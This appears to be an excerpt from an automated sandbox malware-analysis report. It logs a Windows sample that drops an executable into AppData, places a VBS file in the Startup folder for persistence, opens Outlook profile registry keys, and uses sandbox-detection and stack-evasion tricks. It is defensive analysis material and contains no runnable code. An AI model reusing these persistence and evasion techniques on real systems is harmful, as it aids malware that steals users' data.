                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: ty1nyFUMlo.exeStatic file information: File size 1096704 > 1048576
                  Source: ty1nyFUMlo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: ty1nyFUMlo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: ty1nyFUMlo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: ty1nyFUMlo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: ty1nyFUMlo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: ty1nyFUMlo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: ty1nyFUMlo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: enterogenous.exe, 00000002.00000003.1405377070.0000000004420000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000002.00000003.1403392963.0000000004570000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000003.1562636640.0000000004010000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000003.1561654422.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: enterogenous.exe, 00000002.00000003.1405377070.0000000004420000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000002.00000003.1403392963.0000000004570000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000003.1562636640.0000000004010000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000003.1561654422.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                  Source: ty1nyFUMlo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: ty1nyFUMlo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: ty1nyFUMlo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: ty1nyFUMlo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: ty1nyFUMlo.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005142DE
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_00530A76 push ecx; ret 0_2_00530A89
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A50A76 push ecx; ret 2_2_00A50A89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01929A20 push esp; retf 0572h7_2_01929D55
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C786FD push ecx; retf 7_2_06C786FF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_06C79241 push es; ret 7_2_06C79244
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeFile created: C:\Users\user\AppData\Local\translucently\enterogenous.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbsJump to dropped file
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbsJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbsJump to behavior
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_0052F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0052F98E
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeCode function: 0_2_005A1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_005A1C41
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00A4F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00A4F98E
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeCode function: 2_2_00AC1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00AC1C41
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Found API chain indicative of sandbox detection
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                  Source: C:\Users\user\Desktop\ty1nyFUMlo.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98383
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeAPI/Special instruction interceptor: Address: 162FCFC
                  Source: C:\Users\user\AppData\Local\translucently\enterogenous.exeAPI/Special instruction interceptor: Address: 174CCE4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598904Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597811Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597663Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
